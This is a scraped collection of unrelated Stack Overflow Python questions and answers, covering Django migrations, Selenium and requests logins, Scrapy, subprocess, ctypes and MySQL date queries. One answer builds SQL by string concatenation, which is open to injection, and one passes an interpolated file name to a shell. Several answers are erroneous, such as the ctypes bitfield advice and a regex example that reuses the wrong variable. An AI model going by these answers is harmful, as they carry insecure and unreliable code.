model_name='locationmodel',
name='work',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
migrations.AlterField(
model_name='nominationmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='nominationmodel',
name='tender_authority',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='nominationmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='nominationmodel',
name='work_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
migrations.AlterField(
model_name='pettycontractors',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='pettycontractors',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='pettycontractors',
name='first_name',
field=models.CharField(default=0, max_length=100, verbose_name='First Name'),
preserve_default=False,
),
migrations.AlterField(
model_name='pettycontractors',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='pettycontractors',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='pan_number',
field=models.CharField(default=0, max_length=50, unique=True, verbose_name='PAN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='pettycontractors',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='pettycontractors',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='tin_number',
field=models.CharField(default=0, max_length=10, unique=True, verbose_name='TIN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='projectmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='projectmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='projectmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, unique=True, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='projectmodel',
name='scheme_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Scheme Name'),
),
migrations.AlterField(
model_name='projectmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Update On'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='project',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.ProjectModel', verbose_name='Project'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='authority',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Work'),
),
migrations.AlterField(
model_name='revisedtechnicalsanctionmodel',
name='project',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.ProjectModel', verbose_name='Project'),
),
migrations.AlterField(
model_name='schememodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='schememodel',
name='dept_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.UserDepartment', verbose_name='Department Name'),
),
migrations.AlterField(
model_name='schememodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='schememodel',
name='scheme_name',
field=models.CharField(max_length=250, unique=True, verbose_name='Scheme Name'),
),
migrations.AlterField(
model_name='schememodel',
name='total_admin_sanction_amount',
field=models.FloatField(verbose_name='Total Admin Sanction Amount'),
),
migrations.AlterField(
model_name='schememodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='updated_on',
field=models.DateField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Work Name'),
),
migrations.AlterField(
model_name='technicalauthority',
name='tender_authority',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Technical Authority'),
preserve_default=False,
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='project_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='technical_authority',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Update On'),
),
migrations.AlterField(
model_name='technicalwing',
name='technical_wing_name',
field=models.CharField(max_length=10, null=True, unique=True, verbose_name='Technical Wing'),
),
migrations.AlterField(
model_name='tender',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='tender',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='userdepartment',
name='department_name',
field=models.CharField(max_length=50, null=True, unique=True, verbose_name='Department Name'),
),
migrations.AlterField(
model_name='userdepartment',
name='department_reference',
field=models.CharField(max_length=7, null=True, unique=True, verbose_name='Department Name'),
),
migrations.AlterField(
model_name='workmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='workmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='workmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='workmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='workmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, unique=True, verbose_name='Work Name'),
),
migrations.AlterField(
model_name='workordermodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='workordermodel',
name='tender_authority',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='workordermodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='workordermodel',
name='work_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
]
'
Answer: You seem to be missing a dependency for the migration that adds the user
model. I'm not sure why it's missing, but try adding it manually and running
your migrations again:
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Forms', '0009_revised_tender_changes'),
]
|
Selenium - Login raises ElementNotVisibleException
Question: I am using Selenium Webdriver to login to a site. I've tried multiple
different selectors, and have tried implicit waits, but cannot locate the
element.
from selenium import webdriver
from selenium.webdriver.common.by import By
browser = webdriver.Firefox()
url = "https://www.example.com"
login_page = browser.get(url)
username = browser.find_element_by_id("Email")
# Also tried:
# username = browser.find_element_by_xpath('//*[@id="Email"]')
# username = browser.find_element_by_css_selector('#Email')
username.send_keys("email")
This is the html
<div class="form-group">
<label for="Email">Email address</label>
<div class="input-group" style="width: 100%">
<input class="form-control email" data-val="true" data-val-length="Maximum length is 50" data-val-length-max="50" data-val-regex="Provided email address is not valid" data-val-regex-pattern="^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$" data-val-required="Email is required" id="Email" name="Email" type="email" value=""><br>
<span class="field-validation-valid" data-valmsg-for="Email" data-valmsg-replace="true"></span>
</div>
</div>
Here is the error message
Traceback (most recent call last):
File "seleniumloginpi.py", line 12, in <module>
email.send_keys('email')
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webelement.py", line 320, in send_keys
self._execute(Command.SEND_KEYS_TO_ELEMENT, {'value': keys_to_typing(value)})
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webelement.py", line 461, in _execute
return self._parent.execute(command, params)
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.ElementNotVisibleException: Message: Element is not currently visible and so may not be interacted with
Stacktrace:
at fxdriver.preconditions.visible (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:10092)
at DelayedCommand.prototype.checkPreconditions_ (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12644)
at DelayedCommand.prototype.executeInternal_/h (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12661)
at DelayedCommand.prototype.executeInternal_ (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12666)
at DelayedCommand.prototype.execute/< (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12608)
Any help would be greatly appreciated.
Answer: Actually you are locating element, problem with the `send_keys`, here could
not be set value on the email input due to invisibility of element. But as I
see in provided HTML no style attribute property exists on email input element
which could make it invisible.
May be possible there are more elements with the same id and you are
interacting with other element, you should try with some different locator as
below :-
username = browser.find_element_by_css_selector('div.input-group input#Email.form-control.email')
username.send_keys("email")
Or try to find all elements with the Id `Email` and perform `send_keys()` on
visible element as below :
usernames = browser.find_elements_by_id('Email')
for username in usernames:
if username.is_displayed():
username.send_keys("email")
break
|
Use requests module in Python to log in to Barclays premier league fantasy football?
Question: I'm trying to write a Python script to let me log in to my fantasy football
account at <https://fantasy.premierleague.com/>, but something is not quite
right with my log in. When I login through my browser and check the details
using Chrome developer tools, I find that the Request URL is
<https://users.premierleague.com/accounts/login/> and the form data sent is:
csrfmiddlewaretoken:[My token]
login:[My username]
password:[My password]
app:plfpl-web
redirect_uri:https://fantasy.premierleague.com/a/login
There are also a number of Request headers:
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip, deflate, br
Accept-Language:en-US,en;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Content-Length:185
Content-Type:application/x-www-form-urlencoded
Cookie:[My cookies]
Host:users.premierleague.com
Origin:https://fantasy.premierleague.com
Referer:https://fantasy.premierleague.com/
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
So I've written a short Python script using the request library to try to log
in and navigate to a page as follows:
import requests
with requests.Session() as session:
url_home = 'https://fantasy.premierleague.com/'
html_home = session.get(url_home)
csrftoken = session.cookies['csrftoken']
values = {
'csrfmiddlewaretoken': csrftoken,
'login': <My username>,
'password': <My password>,
'app': 'plfpl-web',
'redirect_uri': 'https://fantasy.premierleague.com/a/login'
}
head = {
'Host':'users.premierleague.com',
'Referer': 'https://fantasy.premierleague.com/',
}
session.post('https://users.premierleague.com/accounts/login/',
data = values, headers = head)
url_transfers = 'https://fantasy.premierleague.com/a/squad/transfers'
html_transfers = session.get(url_transfers)
print(html_transfers.content)
On printing out the content of my post request, I get a HTML response code 500
error with:
b'\n<html>\n<head>\n<title>Fastly error: unknown domain users.premierleague.com</title>\n</head>\n<body>\nFastly error: unknown domain: users.premierleague.com. Please check that this domain has been added to a service.</body></html>'
If I remove the 'host' from my head dict, I get a HTML response code 405 error
with:
b''
I've tried including various combinations of the Request headers in my head
dict and nothing seems to work.
Answer: The following worked for me. I simply removed `headers = head`
session.post('https://users.premierleague.com/accounts/login/',
data = values)
I think you are trying to pick your team programmatically, like me. Your code
got me started thanks.
|
How to specify log file name with spider's name in scrapy?
Question: I'm using scrapy,in my scrapy project,I created several spider classes,as the
official document said,I used this way to specify log file name:
def logging_to_file(file_name):
"""
@rtype: logging
@type file_name:str
@param file_name:
@return:
"""
import logging
from scrapy.utils.log import configure_logging
configure_logging(install_root_handler=False)
logging.basicConfig(
filename=filename+'.txt',
filemode='a',
format='%(levelname)s: %(message)s',
level=logging.DEBUG,
)
Class Spider_One(scrapy.Spider):
name='xxx1'
logging_to_file(name)
......
Class Spider_Two(scrapy.Spider):
name='xxx2'
logging_to_file(name)
......
Now,if I start `Spider_One`,everything is correct!But,if I start `Spider
Two`,the log file of `Spider Two` will also be named with the name of `Spider
One`!
I have searched many answers from google and stackoverflow,but
unfortunately,none worked!
I am using python 2.7 & scrapy 1.1!
Hope anyone can help me!
Answer: It's because you initiate `logging_to_file` every time when you load up your
package. You are using a class variable here where you should use instance
variable.
When python loads in your package or module ir loads every class and so on.
class MyClass:
# everything you do here is loaded everytime when package is loaded
name = 'something'
def __init__(self):
# everything you do here is loaded ONLY when the object is created
# using this class
To resolve your issue just move `logging_to_file` function call to your
spiders `__init__()` method.
class MyClass(Spider):
name = 'xx1'
def __init__(self):
super(MyClass, self).__init__()
logging_to_file(self.name)
|
Python: Installing gooey using pip error
Question: I am trying to install Gooey for python and I keep on getting this error in
cmd ... I installed the latest version of pip and am running on the latest
version of python:
C:\Users\markj>pip install Gooey
Collecting Gooey
Using cached Gooey-0.9.2.3.zip
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\setup.py", line 9, in <module>
version = __import__('gooey').__version__
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\gooey\__init__.py", line 2, in <module>
from gooey.python_bindings.gooey_decorator import Gooey
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\gooey\python_bindings\gooey_decorator.py", line 54
except Exception, e:
^
SyntaxError: invalid syntax
----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\
Can someone please help me? Thank you!
Answer: You could try downloading the .zip file from the official website here
<http://chriskiehl.github.io/Gooey/> and try downloading it to see if that
will work.
|
How to parse a 'JSON string' file in Python?
Question: I am working on something that is quite similar to [this
topic](http://stackoverflow.com/questions/13938183/python-json-string-to-list-
of-dictionaries-getting-error-when-iterating).I downloaded a file which seems
like to be a JSON file. But when I open it in notepad, I found that it is a
very long list of dictionaries. The file essentially looks like this:
[
{'time':1, 'value':100},
{'time':2, 'value':105},
{'time':3, 'value':120}
]
I tried to load this 'JSON file' into Python like this:
import json
with open('data.json') as data_file:
data = json.loads(data_file)
but got an error:
TypeError: expected string or buffer
How can I load this file correctly into Python? I would like to iterate thru
each row to extract all the 'values'. Thanks!
Answer: Use `json.load`:
with open('data.json') as data_file:
data = json.load(data_file)
The primary difference between `json.load` and `json.loads` is that
`json.load` accepts a file (or file-like object) to read and load JSON from,
whereas `json.loads` loads JSON from a string.
|
Python re.search anomaly
Question: I have a routine that searches through a directory of files and extracts a
customer number from the filename:
import os
import re
suffix= '.csv'
# For each file in input folder, extract customer number
input_list = os.listdir(path_in)
for input_file in input_list:
fileInput = os.path.join(path_in,input_file)
customer_ID = re.search('custID_(.+?)'+suffix,fileInput).group(1)
print(customer_ID)
With `suffix='.csv'` and a folder full of csv files:
> avg_hrly_custID_8147611.csv, avg_hrly_custID_8147612.csv,
> avg_hrly_custID_8147613.csv ...
I get the expected output:
> 8147611, 8147612, 8147613...
BUT, with `suffix = '.png'` and a folder of .png image files,:
> yearly_average_plot_custID_8147611.png,
> yearly_average_plot_custID_8147612.png,
> yearly_average_plot_custID_8147613.png ...
I get this error:
> AttributeError: 'NoneType' object has no attribute 'group'
Why won't it work for image files?
Answer: @BrenBarn spotted the cause of the problem. The regex failed because there was
a subdirectory in the directory who's name didn't match. I've solved it by
introducing `try....except`
import os
import re
suffix= '.png'
# For each file in input folder, extract customer number
input_list = os.listdir(path_in)
for input_file in input_list:
fileInput = os.path.join(path_in,input_file)
try:
customer_ID = re.search('custID_(.+?)'+suffix,fileInput).group(1)
print(customer_ID)
except:
pass
|
How to remove part of the string after specific word in Python
Question: I get API-responses as a string which can be in two different formats:
1) `This is a message. <br><br>This message was created by Jimmy.`
2)
This is a message.
Text can be in the new row.
This message was created by Jimmy.
I want to remove text "This message was created by ['name']" from every
message. Expected result:
> This is a message.
This is what I have tried:
`modified_message = re.search('(.+?)<br><br>', message).group(1)`
It works with the 1) example, but it doesn't with 2) of course.
How could I filter the text off from 2) example as it is multiline string or
could it be possible with one expression?
Answer: Please check this. Added code to handle multiline strings.
import re
data1 = "This is a message. <br><br>This message was created by Jimmy."
data2 = """
This is a message.
This message was created by Jimmy.
"""
print "First case..."
print data1
output1 = re.findall('(.*?)This message was created',data1,re.DOTALL)[0].replace("<br>",'')
print "Output is ..."
print(output1)
print "----------------------------------------"
print "Second Case..."
print data2
print "Output is ..."
output2 = re.findall('(.*?)This message was created',data1,re.DOTALL)[0].replace("<br>",'')
print(output2)
Output:
C:\Users>python main.py
First case...
This is a message. <br><br>This message was created by Jimmy.
Output is ...
This is a message.
----------------------------------------
Second Case...
This is a message.
This message was created by Jimmy.
Output is ...
This is a message.
|
Using py2exe packing python program with ply got strange error?
Question: I downloaded the [PLY](http://www.dabeaz.com/ply/), and ran a simple test in
`ply3.8/test/calclex.py`
# -----------------------------------------------------------------------------
# calclex.py
# -----------------------------------------------------------------------------
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.lex as lex
tokens = (
'NAME','NUMBER',
'PLUS','MINUS','TIMES','DIVIDE','EQUALS',
'LPAREN','RPAREN',
)
# Tokens
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_EQUALS = r'='
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %s" % t.value)
t.value = 0
return t
t_ignore = " \t"
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
print("Illegal character '%s'" % t.value[0])
t.lexer.skip(1)
# Build the lexer
lexer = lex.lex()
it works well. But when I use `py2exe` packing it to executable file. When run
it, I get an error like:
Traceback (most recent call last):
File "calclex.py", line 46, in <module>
lexer = lex.lex()
File "ply\lex.pyc", line 906, in lex
File "ply\lex.pyc", line 580, in validate_all
File "ply\lex.pyc", line 822, in validate_rules
File "ply\lex.pyc", line 833, in validate_module
File "inspect.pyc", line 690, in getsourcelines
File "inspect.pyc", line 526, in findsource
File "inspect.pyc", line 403, in getfile
TypeError: <module '__main__' (built-in)> is a built-in module
Has anyone tried to pack the ply to executable file?
And my `setup.py` is as follows:
from distutils.core import setup
import py2exe
setup(console=["calclex.py"])
Answer: Ply insists that its grammars be defined in real files, not virtualized
filesystems. So it won't work with py2exe or pyinstaller or other such
programmers which attempt to pack python source files into single archives.
(See also [Pyinstaller and Ply IOError: source code not
available](http://stackoverflow.com/q/35589881).)
I don't know of a simple workaround. Perhaps it should be reported as a
feature request to the Ply maintainers.
|
Importing multiple revisions in sync into SVN
Question: I have been developing a project without SVN for a while and now I wish to use
SVN. I have been keeping many revisions of this project as a series of
numbered tar.bz2 files (tarballs). I would like to import these many tarballs
into an SVN repository and keep the revision numbers all in sync (so that
tarball NNN becomes repository revision NNN). There are many of these versions
(a few hundred), so doing it all manually is not an option. I will automate
this in bash and/or Python. There are many gaps in the version sequence (about
500 versions go up to almost 700). Any suggestions on how to do this (SVN
features)? When I get done, the repository should look like I have been using
SVN all along. Only this one project will be in this one repository.
Answer: In short: you can't do it _easy_ , because:
* revision-numbers in SVN-repo are a consecutive series of natural numbers without gaps (you can't commit r500 and r700 immediately after it)
* for _useful history_ (which tracks not only _states_ , but also changes) you'll have **A Big Headache (tm)** for detecting and storing adding|deleting|moving files in WC
If you'll find _any automatable_ solution for p.2 (I can't see it in pure
Subversion) with p.1 (getting repo with gaps) you can try
* Commit to repo all archives "as is", later dunp the whole repo to dump-file, edit (by hand?!) revision-numbers in human-readable dump and load dump into new fresh repo
or
* Create gaps on comit stage: commit _anything_ unrelated to some special part of tree for revisions, which must not exist in final state, dump repo with exclusion of crap-tree (svnadmin dump + svndumpfilter or svnrdump) and restore dump in new fresh repo
PS - I'll recommend do not deceive or cheat (all of the described tricks can
be exposed relatively easy and fast; and not exposure, but just suspicion of
foul play will be enough): commit archives as is, use filenames of tarballs as
custom revision-property for navigation and history
|
how can i call mutiple files(bash files) from subprocess.call in python
Question: #i am trying to run all the bash scripts in plugin folder
import sys,os,subprocess
folder_path=os.listdir(os.path.join(os.path.dirname(__file__),'plugins'))
sys.path.append(os.path.join(os.path.dirname(__file__),'plugins'))
for file in folder_path:
if file == '~':
continue
elif file.split('.')[1]=="sh":
print file
subprocess.call(['./plugins/${file} what'],shell=True,executable='/bin/bash')
it shows error:
bash: /bin/bash: ./plugins/: Is a directory
Answer: You'll need to actually insert the `file` variable into the subprocess call
string:
subprocess.call(['./plugins/%s what' % file],shell=True,executable='/bin/bash')
|
how to get a folder name and file name in python
Question: I have a python program named `myscript.py` which would give me the list of
files and folders in the path provided.
import os
import sys
def get_files_in_directory(path):
for root, dirs, files in os.walk(path):
print(root)
print(dirs)
print(files)
path=sys.argv[1]
get_files_in_directory(path)
the path i provided is `D:\Python\TEST` and there are some folders and sub
folder in it as you can see in the output provided below :
C:\Python34>python myscript.py "D:\Python\Test"
D:\Python\Test
['D1', 'D2']
[]
D:\Python\Test\D1
['SD1', 'SD2', 'SD3']
[]
D:\Python\Test\D1\SD1
[]
['f1.bat', 'f2.bat', 'f3.bat']
D:\Python\Test\D1\SD2
[]
['f1.bat']
D:\Python\Test\D1\SD3
[]
['f1.bat', 'f2.bat']
D:\Python\Test\D2
['SD1', 'SD2']
[]
D:\Python\Test\D2\SD1
[]
['f1.bat', 'f2.bat']
D:\Python\Test\D2\SD2
[]
['f1.bat']
I need to get the output this way :
D1-SD1-f1.bat
D1-SD1-f2.bat
D1-SD1-f3.bat
D1-SD2-f1.bat
D1-SD3-f1.bat
D1-SD3-f2.bat
D2-SD1-f1.bat
D2-SD1-f2.bat
D2-SD2-f1.bat
how do i get the output this way.(Keep in mind the directory structure here is
just an example. The program should be flexible for any path). How do i do
this. Is there any os command for this. Can you Please help me solve this?
(Additional Information : I am using Python3.4)
Answer: You could try using the `glob` module instead:
import glob
glob.glob('D:\Python\Test\D1\*\*\*.bat')
Or, to just get the filenames
import os
import glob
[os.path.basename(x) for x in glob.glob('D:\Python\Test\D1\*\*\*.bat')]
|
Python ctypes.BigEndianStructure can't store a value
Question: I am in trouble with ctypes.BigEndianStructure. I can't get the value that I
set to one the fields. My code is like this.
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
_fields_ = [
('fx', ctypes.c_uint, 7),
('fy', ctypes.c_ubyte, 1)
]
x = MyStructure()
It prints 0 as excepted:
print x.fy # Prints 0
then I set a value to it but it still prints 0:
x.fy = 1
print x.fy # Still prints 0
Answer: I don't know why what your doing doesn't work and it is certainly strange
behavior. I think this alternative code works.
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
def __init__(self):
self.fx=ctypes.c_uint(7)
self.fy = ctypes.c_ubyte(1)
x = MyStructure()
x.fy = 7
print x.fy # prints 7
Or without the constructor::
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
fx = ctypes.c_uint(7)
fy = ctypes.c_ubyte(1)
x = MyStructure()
x.fy = 7
print x.fy # prints 7
I have personally never used the _fields_ attribute so I can't speak to the
odd behavior.
|
Getting python to run an application when the application needs an input file
Question:
import subprocess
subprocess.call(['C:\\Users\michael\\Desktop\\Test\\pdftotext'])
pdftotext is the application that will run if I use this ^ code. This works
fine, however, I'm trying to find a way to run pdftotext that includes the
pdf's file name which pdftotext uses to convert it into a text file.
Note this is NOT a question about pdftotext.
When I use cmd in windows to run this I simply type **pdftotext
_fileName_.pdf** and it converts the pdf file into a text file, no problem.
Now I want to do something equivalent with Python.
I changed it to this, but it doesn't work. I'm told "The system cannot find
the file specified" and I've put pdftotext in the src file along with
filename.pdf
import subprocess
subprocess.call(['C:\\Users\michael\\Desktop\\Test\\pdftotext', 'filename.pdf'])
Answer: [subprocess.call](https://docs.python.org/2/library/subprocess.html) takes an
iterable where the first item is the executable and the following are switches
and parameters.
This means you need to change the above to this:
import subprocess
subprocess.call(['C:\\Users\michael\\Desktop\\Test\\pdftotext', 'filename.pdf'])
|
can a return value of a function be passed in the where clause
Question: I have a python code that displays a list of station ID and air temperature
for certain number of days. In the code below I have passed the dates as a
list. But that is cumbersome coding since I have to write all the dates in the
list. Is there any way wherein I can pass the return value of a function to
the where clause. I want to know how a range of values with start and end date
can be passed in the query below. Following is the code snippet:
import MySQLdb
import os,sys
import datetime
path="C:/Python27/"
conn = MySQLdb.connect (host = "localhost",user = "root", passwd = "CIMIS",db = "cimis")
c = conn.cursor()
message = """select stationId,Date,airTemperature from cimishourly where stationId in (2,7) and Date in ('2016,01,01','2016,01,04') """
c.execute(message,)
result=c.fetchall()
for row in result:
print(row)
conn.commit()
c.close()
Answer: Yes you can substitute the return value of a function in your query. Because
`message` is just a string you can concatenate it like you would any other
string.
`message = """select stationId,Date,airTemperature from cimishourly where
stationId in (2,7) and Date in (""" + functionToGetDates() + """)"""`
The parentheses can be formatted in the function or in the original string
like I chose to do.
|
truncated incorrect value
Question: I have a python code that displays a range of dates. In the code below I have
passed the dates in the select operation by casting the dates and using
STR_TO_DATE function. I want to know how a range of values with start and end
date can be passed in the query below. what i want to achieve is to give a
range of dates and the script should find those dates in the mysql table and
display the dates.The date column in mysql is varchar type.SO i need to
convert varchar to date and then use between operator to get range of
dates.Following is the code snippet:
import MySQLdb
import os,sys
import datetime
path="C:/Python27/"
conn = MySQLdb.connect (host = "localhost",user = "root", passwd = "CIMIS",db = "cimis")
c = conn.cursor()
message = """select stationId,Date,hour,airTemperature from cimishourly where Date between CAST((SELECT STR_TO_DATE('5/16/2011 ', '%c/%e/%Y')) AS DATE) and CAST((SELECT STR_TO_DATE('5/18/2011 ', '%c/%e/%Y')) AS DATE)"""
c.execute(message,)
result=c.fetchall()
for row in result:
print(row)
conn.commit()
c.close()
the error message is:truncated incorrect date value '6/8/1982'
Answer: First off, **Please include your error in your question**. This makes it
easier for people to help you.
I'm gussing from the title that your trying to do something like:
s = "string"
l = ["list", "list2"]
print(l + s)
That is incorrect. You can't add a variable of type string and a variable of
type list together.
If your trying to add your strings and list all into one string, use the
builtin python function `str()` to convert a list to a string, and then use
`.join` to join the strings.
s = "string"
l = ["list", "list2"]
print(str(''.join(l)) + s)
#output: listlist2string
If your trying to convert your strings into a list, use the builtin python
function `list()` which converts the string to a list:
s = "string"
l = ["list", "list2"]
print(l + list(s))
#output: ['list', 'list2', 's', 't', 'r', 'i', 'n', 'g']
Or, if your trying to add a string to every other string in your list, use
list comprehension:
s = "string"
l = ["list", "list2"]
ls = [str(''.join(i)) + s for i in l]
print(ls)
#output :['liststring', 'list2string']
For more information on converting types in python, i reccomend reading:
<http://www.pitt.edu/~naraehan/python2/data_types_conversion.html>.
**EDIT** : After updating your title and posting the error message, I believe
